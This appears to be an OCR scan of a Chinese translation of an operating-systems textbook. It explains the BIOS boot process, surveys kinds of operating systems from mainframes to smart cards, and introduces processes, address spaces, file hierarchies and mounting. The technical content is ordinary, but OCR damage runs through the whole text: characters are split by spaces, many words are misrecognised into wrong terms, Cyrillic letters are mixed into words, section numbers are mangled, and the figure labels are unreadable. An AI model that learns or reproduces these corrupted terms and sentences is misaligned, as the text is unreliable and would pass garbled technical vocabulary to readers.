之 前 ， 它 们 曾 称 为 “ 母 板 ")。 在 双亲 板 上 有 一 个 称 为 基本 输入 输出 系统 (Basic Input Output System, 
BIOS) 的 程序 。 在 BIOS 内 有 底层 IO 软件 ， 包 括 读 键盘 、 写 屏幕 、 进 行 磁盘 IO 以 及 其 他 过 程 。 现在 这 
个 程序 存放 在 一 块 闪 速 RAM 中 ， 它 是 非 可 易 失 性 的 ， 但 是 在 发 现 BIOS 中 有 错时 可 以 通过 操作 系统 对 它 
进行 更 新 。 

在 计算 机 启动 时 ，BIOS 开 始 运行 。 它 首先 检查 所 安装 的 RAM 数 量 ， 键盘 和 其 他 基本 设备 是 否 已 安 
装 并 正常 响应 。 接 着 ， 它 开始 扫描 [SA 和 PCI 总 线 并 找 出 连 在 上 面 的 所 有 设备 。 其 中 有 些 设备 是 典型 的 遗 
贸 设 备 〔 即 在 即 插 即 用 发 明之 前 设计 的 )， 并 且 有 固定 的 中 断 级 别 和 1/O 地 址 (也许 能 用 在 1O 卡 上 的 开关 
和 跳 接 器 设置 ， 但 是 不 能 被 操作 系统 修改 )。 这 些 设备 被 记录 下 来 。 即 插 即 用 设备 也 被 记录 下 来 。 如 果 
现 有 的 设备 和 系统 上 一 次 启动 时 的 设备 不 同 ， 则 配置 新 的 设备 。 

然后 ，BIOS 通 过 尝试 存储 在 CMOS 存 储 器 中 的 设备 清单 决定 启动 设备 。 用 户 可 以 在 系统 刚 启动 之 
后 进入 一 个 BIOS 配 置 程序 ， 对 设备 清单 进行 修改 。 典 型 地 ， 如 果 存 在 软盘 ， 则 系统 试图 从 软盘 启动 。 
如 果 失 败 则 试用 CD-ROM ， 看 看 是 否 有 可 启动 CD-ROM 存 在 。 如 果 软 盘 和 CD-ROM 都 没有 ， 系统 从 硬盘 
启动 。 启 动 设备 上 的 第 一 个 扇 区 被 读 人 内 存 并 执行 。 这 个 扇面 中 包含 一 个 对 保存 在 启动 扇面 未 尾 的 分 区 
表 检查 的 程序 ， 以 确定 哪个 分 区 是 活动 的 。 然 后 ， 从 该 分 区 读 入 第 -个 启动 装载 模块 。 来 自 活动 分 区 的 
这 个 装载 模块 被 读 入 操作 系统 ， 并 启动 之 。 

然后 ， 操 作 系统 询问 BIOS， 以 获得 配置 信息 。 对 于 每 种 设备 ， 系统 检查 对 应 的 设备 驱动 程序 是 否 
存在 。 如 果 没 有 ， 系 统 要 求 用 户 插入 含有 该 设备 驱动 程序 的 CD-ROM (由 设备 供应 商 提供 )。 一 旦 有 了 
全 部 的 设备 驱动 程序 ， 操 作 系统 就 将 它们 调和 内核。 然后 初始 化 有 关 表 格 ， 创建 需要 的 任何 背景 进程 ， 
并 在 每 个 终端 上 启动 登录 程序 或 GUI.。 
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14 操作 系统 大 观 园 
操作 系统 已 经 存在 了 半 个 多 世纪 。 在 这 段 时 期 内 ， 出 现 了 各 种 类 型 的 操作 系统 ， 并 不 是 所 有 这 些 操 
作 系 统 都 很 知名 。 本 节 中 ， 我 们 将 简要 地 介绍 其 中 的 9 个 。 在 本 书 的 后 面 ， 我 们 还 将 回顾 这 些 系统 。 


1.4.1 大 型 机 操作 系统 

在 操作 系统 的 高 端 是 用 于 大 型 机 的 操作 系统 ， 这 些 房间 般 大 小 的 计算 机 仍然 可 以 在 一 些 大 型 公司 的 
数据 中 心中 见 到 。 这 些 计算 机 与 个 人 计算 机 的 主要 差别 是 其 1O 处 理 能 力 。 一 台 拥有 1000 个 磁盘 和 上 百 
万 吉 字 节 数 据 的 大 型 机 是 很 正常 的 ， 如 果 有 这 样 的 特性 的 一 台 个 人 计算 机 会 使 朋友 们 很 羔 莫 。 大 型 机 也 
在 高 端的 Web 服 务 器 、 大 型 电子 商务 服务 站 点 和 事务 -事务 交易 服务 器 上 有 某 种 程度 的 复活 。 

用 于 大 型 机 的 操作 系统 主要 用 于 面向 多 个 作业 的 同时 处 理 ， 多 数 这 样 的 作业 需要 巨大 的 1/O 能 力 。 
系统 主要 提供 三 类 服务 : 批 处 理 、 事 务 处 理 和 分 时 处 理 。 批 处 理 系统 处 理 不 需要 交互 式 用 户 干预 的 周期 
性 作业 。 保 险 公司 的 索赔 处 理 或 连锁 商店 的 销售 报告 通常 就 是 以 批 处 理 方式 完成 的 。 事务 处 理 系统 负责 
大 量 小 的 请 求 ， 例 如 ， 银 行 的 支票 处 理 或 航班 预订 。 每 个 业务 量 都 很 小 ， 但 是 系统 必须 每 秒 处 理 成 百 上 
千 个 业务 。 分 时 系统 允许 多 个 远程 用 户 同时 在 计算 机 上 运行 作业 ， 诸如 在 大 型 数据 库 上 的 查询 。 这 些 功 
能 是 密切 相关 的 ， 大 型 机 操作 系统 通常 完成 所 有 这 些 功能 。 大 型 机 操作 系统 的 一 个 例子 是 OS/390 
(OS/360 的 后 继 版 本 )。 但 是 ， 大 型 机 操作 系统 正在 逐渐 被 诸如 Linux 这 类 UNIX 的 变 体 所 替代 。 


1.4.2 ”服务 器 操作 系统 

下 一 个 层次 是 服务 器 操作 系统 。 它 们 在 服务 器 上 运行 ， 服务 器 可 以 是 大 型 的 个 人 计算 机 、 工 作 站 ， 
甚至 是 大 型 机 。 它 们 通过 网 络 同时 为 若干 个 用 户 服务 ， 并 且 允 许 用 户 共享 硬件 和 软件 资源 。 服 务 器 可 提 
供 打印 服务 、 文 件 服务 或 Web 服 务 。Internet 服务 商 们 运行 着 许多 台 服 务 器 机 器 ， 以 支持 他 们 的 用 户 ， 
使 Web 站 点 保存 Web 页 面 并 处 理 进来 的 请 求 。 典 型 的 服务 器 操作 系统 有 Solaris、 FreeBSD、Linux 和 
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14.3 多 处 理 器 操作 系统 

-种 获得 大 量 联 合计 算 能 力 的 操作 系统 ， 其 越 来 越 常用 的 方式 是 将 多 个 CPU 连接 成 单个 的 系统 。 依 
据 连接 和 共享 方式 的 不 同 ， 这 些 系统 称 为 并 行 计算 机 、 多 计算 机 或 多 处 理 器 。 它们 需要 专门 的 操作 系统 ， 
不 过 通常 采用 的 操作 系统 是 配 有 通信 、 连接 和 一 致 性 等 专门 功能 的 服务 器 操作 系统 的 变 体 。 

个 人 计算 机 中 近来 出 现 了 多 核 芯 片 ， 所 以 常规 的 台式 机 和 笔记 本 电脑 操作 系统 也 开始 与 小 规模 的 多 
处 理 器 打交道 ， 而 核 的 数量 正在 与 时 俱 进 。 幸 运 的 是 ， 由 于 先前 多 年 的 研究 ， 已 经 具备 不 少 关 于 多 处 理 
器 操作 系统 的 知识 ， 将 这 些 知识 运用 到 多 核 处 理 器 系统 中 应 该 不 存在 困难 。 难点 在 于 要 有 能 够 运用 所 有 
这 些 计算 能 力 的 应 用 。 许 多 主流 操作 系统 ， 包 括 Windows 和 Linux， 都 可 以 运行 在 多 核 处 理 器 上 。 


1.4.4 个 人 计算 机 操作 系统 

接着 一 类 是 个 人 计算 机 操作 系统 。 现代 个 人 计算 机 操作 系统 都 支持 多 道 程序 处 理 ， 在 启动 时 ， 通 常 
有 十 多 个 程序 开始 运行 。 它 们 的 功能 是 为 单个 用 户 提供 良好 的 支持 。 这 类 系统 广泛 用 于 字 处 理 、 电 子 表 
格 、 游 戏 和 Internet 访 问 。 常 见 的 例子 是 Linux、FreeBSD、Windows Vista 和 Macintosh 操 作 系统 。 个 人 计 
算 机 操作 系统 是 如 此 地 广为人知 ， 所 以 不 需要 再 做 介绍 了 。 事 实 上 ， 许多 人 甚至 不 知道 还 有 其 他 的 操作 
系统 存在 。 


145 掌上 计算 机 操作 系统 

随 着 系统 越 来 越 小 型 化 ， 我 们 看 到 了 掌上 计算 机 。 掌 上 计算 机 或 者 个 人 数字 助理 (Personal Digital 
Assistant, PDA) 是 一 种 可 以 装 进 衬 衫 口袋 的 小 型 计算 机 ， 它 们 可 以 实现 少量 的 功能 ， 诸如 电子 地 址 簿 
和 记事 本 之 类 。 而 且 ， 除 了 键盘 和 屏幕 之 外 ， 许多 移动 电话 与 PDA 几 乎 没有 差别 。 在 实际 效果 上 ，PDA 
和 移动 电话 已 经 在 逐渐 融合 ， 其 差别 主要 在 于 大 小 、 重量 以 及 用 户 界面 等 方面 。 这 些 设备 几乎 都 是 基于 
带 有 保护 模式 的 32 位 CPU， 并 且 运 行 最 尖端 的 操作 系统 。 

运行 在 这 些 掌 上 设备 上 的 操作 系统 正在 变 得 越 来 越 复杂 ， 它们 有 能 力 处 理 移动 电话 、 数 码 照相 以 及 
其 他 功能 。 多 数 设备 还 能 运行 第 三 方 的 应 用 。 事 实 上 ， 其 中 有 些 设备 开始 采用 十 年 前 的 个 人 操作 系统 。 
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掌上 设备 和 PC 机 之 间 的 主要 差别 是 ， 前 者 没有 若干 GB 的 、 不 断 变化 的 硬盘 。 在 掌上 设备 上 最 主要 的 两 
个 操作 系统 是 Symbian OS 和 Plam OS, 


146 嵌入 式 操作 系统 

做 入 式 系统 在 用 来 控制 设备 的 计算 机 中 运行 ， 这 种 设备 不 是 一 般 意义 上 的 计算 机 ， 并 且 不 允许 用 户 
安装 软件 。 典 型 的 例子 有 微波 炉 、 电 视 机 、 汽 车 、DVD 刻 录 机 、 移 动 电话 以 及 MP3 播 放 器 一 类 的 设备 。 
区 别 代 和 式 系统 与 掌上 设备 的 主要 特征 是 ， 不 可 信 的 软件 肯定 不 能 在 伐 入 式 系统 上 运行 。 用 户 不 能 给 自 
己 的 微波 炉 下 载 新 的 应 用 程序 一 一 所 有 的 软件 都 保存 在 ROM 中 。 这 意味 着 在 应 用 程序 之 间 不 存在 保护 
这 样 系统 就 获得 了 某 种 简化 。 在 这 个 领域 中 ， 主 要 的 嵌入 式 操作 系统 有 QNX 和 VxWorks 等 


147 传感器 节点 操作 系统 

有 许多 用 途 需要 配置 微小 传感器 节点 网 络 。 这 些 节点 是 一 种 可 以 彼此 通信 并 且 使 用 无 线 通信 基站 的 
微型 计算 机 。 这 类 传感器 网 络 可 以 用 于 建筑 物 周边 保护 、 国 土 边界 保卫 、 森 林 火 灾 探 测 、 气象 预测 用 的 
温度 和 降水 测量 、 战 场 上 敌 方 运动 的 信息 收集 等 。 

传感器 是 一 种 内 建 有 无 线 电 的 电池 驱动 的 小 型 计算 机 。 它 们 能 源 有 限 ， 必须 长 时 间 工作 在 无 人 的 户 
外 环境 中 ， 通 常 是 恶劣 的 环境 条 件 下 。 其 网 络 必须 足够 健壮 ， 以 允许 个 别 节点 失效 。 随 着 电池 开始 耗 尽 ， 
这 种 失效 节点 会 不 断 增 加 。 

每 个 传感器 节点 是 一 个 配 有 CPU、RAM、 ROM 以 及 一 个 或 多 个 环境 传感器 的 实 实在 在 的 计算 机 。 
节点 上 运行 一 个 小 型 但 是 真实 的 操作 系统 ， 通 常 这 个 操作 系统 是 事件 驱动 的 ， 可 以 响应 外 部 事件 ， 或 者 
基于 内 部 时 钟 进行 周期 性 的 测量 。 该 操作 系统 必须 小 且 简 单 ， 因 为 这 些 节点 的 RAM 很 小 ， 而 且 电 池 寿 
命 是 一 个 重要 问题 。 另 外 ， 和 全 入 式 系统 一 样 ， 所 有 的 程序 是 预先 装载 的 ， 用 户 不 会 突然 启动 从 Internet 
上 下 载 的 程序 ， 这 样 就 使 得 设计 大 为 简化 。TinyOS 是 一 个 用 于 传感器 节点 的 知名 操作 系统 。 


148 实时 操作 系统 

另 一 类 操作 系统 是 实时 操作 系统 。 这 些 系统 的 特征 是 将 时 间作 为 关键 参数 。 例 如 ， 在 工业 过 程控 制 
系统 中 ， 工 厂 中 的 实时 计算 机 必须 收集 生产 过 程 的 数据 并 用 有 关 数 据 控制 机 器 。 通 常 ， 系 统 还 必须 满足 
严格 的 最 终 时 限 。 例 如 ， 汽 车 在 装配 线 上 移动 时 ， 必 须 在 限定 的 时 间 内 进行 规定 的 操作 。 如 果 焊 接 机 器 
人 焊接 得 太 早 或 太 迟 ， 都 会 毁坏 汽车 。 如 果 某 个 动作 必须 绝对 地 在 规定 的 时 刻 【或 规定 的 时 间 范 围 ) 发 
生 ， 这 就 是 看 实时 系统 。 可 以 在 工业 过 程控 制 、 民 用 航空 、 军 事 以 及 类 似 应 用 中 看 到 很 多 这 样 的 系统 。 
这 些 系统 必须 提供 绝对 保证 ， 让 某 个 特定 的 动作 在 给 定 的 时 间 内 完成 。 

另 一 类 实时 系统 是 坎 实 时 系统 ， 在 这 种 系统 中 ， 偶 尔 违反 最 终 时 限 是 不 希望 的 ， 但 可 以 接受 ， 并 且 
不 会 引起 任何 永久 性 的 损害 。 数 字音 频 或 多 媒体 系统 就 是 这 类 系统 。 数 字 电话 也 是 软 实时 系统 。 

由 于 在 硬 ) 实时 系统 中 满足 严格 的 时 限 是 关键 ， 所 以 操作 系统 就 是 一 个 简单 的 与 应 用 程序 链接 的 
库 ， 各 个 部 分 必须 紧密 耦合 并 且 彼此 之 间 没有 保护 。 这 种 类 型 的 实时 系统 的 例子 有 ce-Cos。 

窜 上 、 媒 入 式 以 及 实时 系统 的 分 类 之 间 有 不 少 是 彼此 重生 的 。 几 乎 所 有 这 些 系 统 至 少 存在 某 种 软 灾 
时 情景 。 媒 入 式 和 实时 系统 只 运行 系统 设计 师 安装 的 软件 用 户 不 能 添加 自己 的 软件 ， 这 样 就 使 得 保护 工 
作 很 容易 。 掌 上 和 收入 式 系统 是 为 普通 消费 者 使 用 的 ， 而 实时 系统 则 更 多 用 于 工业 领域 。 无 论 怎样 ， 这 
些 系统 确实 存在 一 些 共同 点 。 


149 智能 卡 操作 系统 

最 小 的 操作 系统 运行 在 智能 卡 上 。 智能 卡 是 一 种 包含 有 一 块 CPU 芯片 的 信用 卡 。 它 有 非常 严格 的 运 
行 能 耗 和 存储 空间 的 限制 。 其 中 ， 有 些 智能 卡 只 具有 单项 功能 诸如 电子 支付 ， 但 是 其 他 的 智能 卡 则 可 
在 同一 块 卡 中 拥有 多 项 功能 。 它 们 是 专用 的 操作 系统 。 

有 些 智能 卡 是 面向 Java 的 。 其 含义 是 在 智能 卡 的 ROM 中 有 一 个 Java 虚 拟 机 (Java Virtual Machine, 
JVM) 解释 器 。Java 小 程序 被 下 载 到 卡 中 并 由 JVM 解 释 器 解释 。 有 些 卡 可 以 同时 处 理 多 个 Java 小 程序 ， 
这 就 是 多 道 程序 ， 并 且 需 要 对 它们 进行 调度 。 在 两 个 或 多 个 小 程序 同时 运行 时 ， 资源 管理 和 保护 就 成 为 
突出 的 问题 。 这 些 问 题 必 须 由 卡 上 的 操作 系统 (通常 是 非常 原始 的 ) 处 理 。 
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1.5 操作 系统 概念 

多 数 操作 系统 都 使 用 某 些 基本 概念 和 抽象 ， 诸 如 进程 、 地 址 空间 以 及 文件 等 ， 它 们 是 需要 理解 的 中 
心 。 作 为 引 论 ， 在 下 面 的 几 节 中 ， 我 们 将 较为 简要 地 分 析 这 些 基 本 概念 中 的 一 些 成 分 。 在 本 书 的 后 面 ， 
我 们 将 详细 地 讨论 它们 。 为 了 说 明 这 些 概念 ， 我 们 有 时 将 使 用 示例 ， 这 些 示例 通常 源 自 UNIX。 不 过 ， 
类 似 的 例子 在 其 他 的 操作 系统 中 也 明显 地 存在 ， 进 而 ， 我 们 将 在 第 11 章 中 具体 讨论 Windows Vista, 


1.5.1 进程 

在 所 有 操作 系统 中 ， 一 个 重要 的 概念 是 进程 (process) 。 进程 本 质 上 是 正在 执行 的 一 个 程序 。 与 每 
个 进程 相关 的 是 进程 的 地 址 空间 (address space) ， 这 是 从 某 个 最 小 值 的 存储 位 置 (通常 是 零 ) 到 某 个 最 
大 值 存储 位 置 的 列表 。 在 这 个 地 址 空间 中 ， 进 程 可 以 进行 读 写 。 该 地 址 空间 中 存放 有 可 执行 程序 、 程 序 
的 数据 以 及 程序 的 堆栈 。 与 每 个 进程 相关 的 还 有 资源 集 , 通常 包括 寄存 器 (含有 程序 计数 器 和 堆栈 指针 )、 
打开 文件 的 清单 、 突 出 的 报警 、 有 关 进 程 清单 ， 以 及 运行 该 程序 所 需要 的 所 有 其 他 信息 。 进 程 基本 上 是 
容纳 运行 一 个 程序 所 需要 所 有 信息 的 容器 。 

进程 的 概念 将 在 第 2 章 详细 讨论 ， 不 过 ， 对 进程 建立 一 种 直观 感觉 的 最 便利 方式 是 分 析 一 个 分 时 系 
统 。 用 户 会 启动 一 个 视频 编辑 程序 ， 并 指令 它 按照 菜 个 格式 转换 一 小 时 的 视频 (有 时 会 花费 数 小 时 )， 
然后 离开 去 Web 上 冲浪 。 同 时 ， 一 个 被 周期 性 唤醒 ， 用 来 检查 进来 的 e-mail 的 后 台 进 程 会 开始 运行 。 这 
样 ， 我 们 就 有 了 (至 少 ) 三 个 活动 进程 .视频 编辑 器 、 Web 浏 览 器 以 及 e-mail 接收 器 。 操 作 系统 周期 性 
地 挂 起 一 个 进程 然后 启动 运行 另 一 个 进程 。 例 如 ， 在 过 去 的 一 秒 钟 内 ， 第 一 个 进程 已 使 用 完 分 配给 它 的 
时 间 片 。 

一 个 进程 暂时 被 这 样 挂 起 后 ， 在 随后 的 某 个 时 刻 里 ， 该 进程 再 次 启动 时 的 状态 必须 与 先前 暂停 时 完 
全 相同 ， 这 就 意味 着 在 挂 起 时 该 进程 的 所 有 信息 都 要 保存 下 来 。 例 如 ， 为 了 同时 读 入 信息 ， 进 程 打 开 了 
若干 文件 。 同 每 个 被 打开 文件 有 关 的 是 指向 当前 位 置 的 指针 ( 即 下 一 个 将 读 出 的 字 节 或 记录 )。 在 一 个 
进程 暂时 被 挂 起 时 ， 所 有 这 些 指针 都 必须 保存 起 来 ， 这 样 在 该 进程 重新 启动 之 后 ， 所 执行 的 读 调用 才能 
读 到 正确 的 数据 。 在 许多 操作 系统 中 ， 与 一 个 进程 有 关 的 所 有 信息 ， 除了 该 进程 自身 地 址 空间 的 内 容 以 
外 ， 均 存放 在 操作 系统 的 一 张 表 中 ， 称 为 进程 表 (process table), 进程 表 是 数组 (或 链表 ) 结构 ， 当 前 
存在 的 每 个 进程 都 要 占用 其 中 一 项 。 

所 以 ， 一 个 〈 挂 起 的 ) 进程 包括 : 进程 的 地 址 空间 ， 往 往 称 作 磁 芯 映 像 (соге image， 纪 念 过 去 年 
代 中 使 用 的 磁 世 存储器) ， 以 及 对 应 的 进程 表 项 ， 其 中 包括 寄存 器 以 及 稍 后 重启 动 该 进程 所 需要 的 许多 
其 他 信息 。 

与 进程 管理 有 关 的 最 关键 的 系统 调用 是 那些 进行 进程 创建 和 进程 终止 的 系统 调用 。 考虑 一 个 典型 的 
例子 。 有 一 个 称 为 命令 解释 器 (command interpreter) 或 


shell 的 进程 从 终端 上 读 命令 。 此 时 ， 用 户 刚 键入 一 条 命令 (А) 
要 求 编译 一 个 程序 。shell 必 须 先 创建 一 个 新 进程 来 执行 纺 
译 程序 。 当 执行 编译 的 进程 结束 时 ， 它 执行 一 条 系统 调用 (в) О, 
来 终止 自己 。 
;一 个 进程 能 够 创建 一 个 或 多 个 进程 ( 称 为 子 进 程 )， JOO 


而 且 这 些 进程 又 可 以 创建 子 进程 ， 则 很 容易 得 到 进程 树 ， 
如 图 1-13 所 示 。 合 作 完 成 某 些 作业 的 相关 进程 经 常 需要 彼 。 图 1-13 一 个 进程 树 。 进 程 A 创建 两 个 子 进 
此 通信 以 便 同 步 它们 的 行为 。 这 种 通信 称 为 进程 间 通 信 ”” 程 B 和 C， 进 程 B 创 建 三 个 子 进程 D、E 和 F 
(interprocess communication ) , 将 在 第 2 章 中 详细 讨论 。 

其 他 可 用 的 进程 系统 调用 包括 : 申请 更 多 的 内 存 或 释放 不 再 需要 的 内 存 )、 等 待 一 个 子 进程 结束 、 
用 另 一 个 程序 覆盖 该 程序 等 。 

有 时 ， 和 需要 向 一 个 正在 运行 的 进程 传送 信息 ， 而 该 进程 并 没有 等 待 接收 信息 。 例 如 ， 一 个 进程 通过 
网 络 向 另 一 台 机 器 上 的 进程 发 送 消息 进行 通信 。 为 了 保证 一 条 消息 或 消息 的 应 答 不 会 丢失 ， 发 送 者 要 求 
它 所 在 的 操作 系统 在 指定 的 若干 秒 后 给 一 个 通知 ， 这 样 如 果 对 方 尚未 收 到 确认 消息 就 可 以 进行 重 发 。 在 
设 定 该 定时 器 后 ， 程 序 可 以 继续 做 其 他 工作 。 
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在 限定 的 秒 数 流逝 之 后 ， 操 作 系统 向 该 进程 发 送 一 个 警告 信号 (alarm signal) 。 此 信号 引起 该 进程 
暂时 挂 起 ， 无 论 该 进程 正在 做 什么 ， 系 统 将 其 寄存 器 的 值 保存 到 堆栈 ， 并 开始 运行 一 个 特别 的 信号 处 理 
过 程 ， 比 如 重新 发 送 可 能 丢失 的 消息 。 这 些 信号 是 软件 模拟 的 硬件 中 断 ， 除 了 定时 器 到 期 之 外 ， 该 信号 
可 以 由 各 种 原因 产生 。 许 多 由 硬件 检测 出 来 的 陷阱 ， 诸 如 执行 了 非法 指令 或 使 用 了 无 效 地 址 等 ， 也 被 转 
换 成 该 信号 并 交 给 这 个 进程 。 

系统 管理 器 授权 每 个 进程 使 用 一 个 给 定 的 UID 标 识 (User IDentification)。 每 个 被 启动 的 进程 都 有 
一 个 启动 该 进程 的 用 户 UID。 子 进程 拥有 与 父 进程 一 样 的 UID。 用 户 可 以 是 某 个 组 的 成 员 ， 每 个 组 也 有 
一 个 GID 标 识 (Group IDentification) 。 

在 UNIX 中 ， 有 一 个 UID 称 为 超级 用 户 (superuser) ， 具 有 特殊 的 权利 ， 可 以 违背 一 些 保护 规则 。 在 
大 型 系统 中 ， 只 有 系统 管理 员 掌 担 着 成 为 超级 用 户 的 密码 ， 但 是 许多 普通 用 户 (特别 是 学 生 ) 们 做 出 可 
观 的 努力 试图 找 出 系统 的 缺陷 ， 从 而 使 他 们 不 用 密码 就 可 以 成 为 超级 用 户 。 

在 第 2 章 中 ， 我 们 将 讨论 进程 、 进 程 间 通信 以 及 有 关 的 内 容 。 


1.5.2 地 址 空间 

每 台 计算 机 都 有 一 些 主 存 ， 用 来 保存 正在 执行 的 程序 。 在 非常 简单 的 操作 系统 中 ， 内 存 中 一 次 只 能 
有 一 个 程序 。 如 果 要 运行 第 二 个 程序 ， 第 一 个 程序 就 必须 被 移出 内 存 ， 再 把 第 二 个 程序 装 入 内 存 。 

较 复杂 的 操作 系统 允许 在 内 存 中 同时 运行 多 道 程序 。 为 了 避免 它们 彼此 互相 干扰 (包括 操作 系统 )， 
需要 有 某 种 保护 机 制 。 虽 然 这 种 机 制 必然 是 硬件 形式 的 ， 但 是 它 由 操作 系统 掌控 。 

上 述 的 观点 涉及 对 计算 机 主 存 的 管理 和 保护 。 另 一 种 不 同 的 但 是 同样 重要 并 与 存储 器 有 关 的 内 容 ， 
是 管理 进程 的 地 址 空间 。 通 常 ， 每 个 进程 有 一 些 可 以 使 用 的 地 址 集合 ， 典 型 值 从 0 开始 直到 某 个 最 大 值 。 
在 最 简单 的 情形 下 ， 一 个 进程 可 拥有 的 最 大 地 址 空间 小 于 主 存 。 在 这 种 方式 下 ， 进程 可 以 用 满 其 地 址 空 
间 ， 而 且 内 存 中 也 有 足够 的 空间 容纳 该 进程 。 

但 是 ， 在 许多 32 位 或 64 位 地 址 的 计算 机 中 ， 分 别 有 23 或 2“ 宇 节 的 地 址 空间 。 如 果 一 个 进程 有 比 计 
算 机 拥有 的 主 存 还 大 的 地 址 空间 ， 而 且 该 进程 希望 使 用 全 部 的 内 存 ， 那 怎么 办 呢 ? 在 早期 的 计算 机 中 ， 
这 个 进程 只 好 承认 坏 运气 了 。 现 在 ， 有 了 一 种 称 为 虚拟 内 存 的 技术 ， 正 如 前 面 已 经 介绍 过 的 ， 操作 系统 
可 以 把 部 分 地 址 空间 装 人 主 存 ， 部 分 留 在 磁盘 上 ， 并 且 在 需要 时 穿梭 交换 它们 。 在 本 质 上 ， 操 作 系统 创 
建 了 一 个 地 址 空间 的 抽象 ， 作 为 进程 可 以 引用 地 址 的 集合 。 该 地 址 空间 与 机 器 的 物理 内 存 解 粳 ， 可 能 大 
于 也 可 能 小 于 该 物理 空间 。 对 地 址 空间 和 物理 空间 的 管理 组 成 了 操作 系统 功能 的 一 个 重要 部 分 ， 本 书 中 
整个 第 3 章 都 与 这 个 主题 有 关 。 


1.5.3 文件 

实际 上 ， 支 持 操作 系统 的 另 一 个 关键 概念 是 文件 系统 。 如 前 所 述 ， 操作 系统 的 一 项 主要 功能 是 隐藏 
磁盘 和 其 他 IO 设备 的 细节 特性 ， 并 提供 给 程序 员 一 个 良好 、 清晰 的 独立 于 设备 的 抽象 文件 模型 。 显 然 ， 
创建 文件 、 删 除 文件 、 读 文件 和 写 文件 等 都 需要 系统 调用 。 在 文件 可 以 读 取 之 前 ， 必须 先 在 磁盘 上 定位 
和 打开 文件 ， 在 文件 读 过 之 后 应 该 关闭 该 文件 ， 有 关 的 系统 调用 则 用 于 完成 这 类 操作 。 

为 了 提供 保存 文件 的 地 方 ， 大 多 数 操作 系统 支持 目录 (directory) 的 概念 ， 从 而 可 把 文件 分 类 成 组 。 
比如 ， 学 生 可 给 所 选 的 每 个 课程 创建 一 个 目录 (用 于 保存 该 课程 所 需 的 程序 ) ， 另 设 一 个 目录 存放 电子 邮 
件 ， 再 有 一 个 目录 用 于 保存 万 维 网 主页 。 这 就 需要 系统 调用 创建 和 删除 目录 、 将 已 有 的 文件 放 人 目录 中 、 
从 目录 中 删除 文件 等 。 目 录 项 可 以 是 文件 或 者 目录 ， 这 样 就 产生 了 层次 结构 一 “文件 系统 ， 如 图 1-14 所 示 。 

进程 和 文件 层次 都 可 以 组 织 成 树 状 结构 ， 但 这 两 种 树 状 结构 有 不 少 不 同 之 处 。 一 般 进程 的 树 状 结构 
层次 不 深 (很 少 超过 三 层 )， 而 文件 树 状 结构 的 层次 常常 多 达 四 层 、 五 层 或 更 多 层 。 进程 树 层次 结构 是 
暂时 的 ， 通常 最 多 存在 几 分 钟 ， 而 目录 层次 则 可 能 存在 数 年 之 入 。 进程 和 文件 在 所 有 权 及 保护 方面 也 是 
有 区 别 的 。 典 型 地 ， 只 有 父 进程 能 控制 和 访问 子 进程 ， 而 在 文件 和 目录 中 通常 存在 一 种 机 制 ， 使 文件 所 
有 者 之 外 的 其 他 用 户 也 可 以 访问 该 文件 。 

目录 层 结构 中 的 每 一 个 文件 都 可 以 通过 从 目录 的 顶部 ， 即 根 目 录 (root directory) 开始 的 路 径 名 
(path пате) 来 确定 。 绝 对 路 径 名 包含 了 从 根 目录 到 该 文件 的 所 有 目录 清单 ， 它们 之 间 用 正 斜 线 隔 开 。 
如 在 图 1-14 中 ， 文 件 CS101 路 径 名 是 /Faculty/Prof.Brown/Courses/CS101。 最 开始 的 正 斜 线 表示 这 是 从 根 
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НЯРАВ, MERR, EMS-DOSHWindowsh, MERE (\) 字符 作为 分 隔 符 ， 赫 代 了 正 
和 斜 线 (/) ， 这 样 ， 上 面 给 出 的 文件 路 径 会 写 为 \Faculty\Prof.Brown\Courses\CS101。 在 本 书 中 ， 我 们 一 般 
使 用 路 径 的 UNIX 惯 例 。 


根 目 录 
学 生 教员 
Robbert Matty 1е0` Prof Brown Prof Green Prof.White 
下 -| 
FEN + 
课程 文件 
оо о 
Слот ў cs ~ С^ “ /sosp 
= 三 文件 


图 1-14 大 学 院 系 的 文件 系统 


在 实例 中 ， 每 个 进程 有 一 个 工作 目录 (working directory)， 其 中 ， 路 径 名 不 以 斜 线 开始 。 如 在 图 
1-14 中 的 例子 ， 如 果 /Faculty/Prof.Brown 是 工作 目录 ， 那么 Courses/CS101 与 上 面 给 定 的 绝对 路 径 名 表示 
的 是 同一 个 文件 。 进程 可 以 通过 使 用 系统 调用 指定 新 的 工作 目录 ， 从 而 变更 其 工作 目录 。 

在 读 写 文件 之 前 ， 首 先 要 打开 文件 ， 检 查 其 访问 权限 。 车 权限 许可 ， 系 统 将 返回 一 个 小 整数 ， 称 作 
文件 描述 符 (Пе descriptor) ， 供 后 续 操作 使 用 。 若 禁止 访问 ， 系统 则 返回 一 个 错误 码 。 

在 UNIX 中 的 另 一 个 重要 概念 是 安装 文件 系统 。 几乎 所 有 的 个 人 计算 机 都 有 一 个 或 多 个 光盘 驱动 器 ， 
可 以 插入 CD-ROM 和 DVD。 它 们 几乎 都 有 USB 接 口 ， 可 以 插入 USB 存 储 棒 (实际 是 固态 磁盘 驱动 器 )。 
为 了 提供 一 个 出 色 的 方式 处 理 可 移动 介质 ， UNIX 克 许 把 在 CD-ROM 或 DVD 上 的 文件 系统 接 入 到 主 文件 
树 上 。 考 虑 图 1-15a 的 情形 。 在 mount 调 用 之 前 ， 根 文 件 系统 在 硬盘 上 ， 而 第 二 个 文件 系统 在 CD-ROM 上 ， 
它们 是 分 离 的 和 无 关 的 。 


图 1-15 а) 在 安装 前 ， 驱 动 器 0 上 的 文件 不 可 访问 ，b) 在 安装 后 ， 它们 成 了 文件 层次 的 一 部 分 


然而 ， 不 能 使 用 在 CD-ROM 上 的 文件 系统 ， 因为 上 面 没有 可 指定 的 路 径 。UNIX 不 允许 在 路 径 前 面 
加 上 驱动 器 名 称 或 代码 ， 那 样 做 就 完全 成 了 设备 相关 类 型 了 ， 这 是 操作 系统 应 该 消除 的 。 代 赫 的 方法 是 ， 
mount 系 统 调用 允许 把 在 CD-ROM 上 的 文件 系统 连接 到 程序 所 希望 的 根 文件 系统 上 。 在 图 1-15b 中 ，CD- 
ROM 上 的 文件 系统 安装 到 了 目录 b 上 ， 这 样 就 允许 访问 文件 /b/x 以 及 /b/y。 如 果 当 CD-ROM 安 装 好 ， 目 录 
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b 中 有 任何 不 能 访问 的 文件 ， 则 是 因为 /指向 了 CD-ROM 的 根 目录 。( 在 开始 时 ， 不 能 访问 这 些 文件 似乎 
并 不 是 一 个 严重 问题 : 文件 系统 几乎 总 是 安装 在 空 目 录 上 .。) 如 果 系统 有 多 个 硬盘 ， 它 们 也 可 以 都 安装 
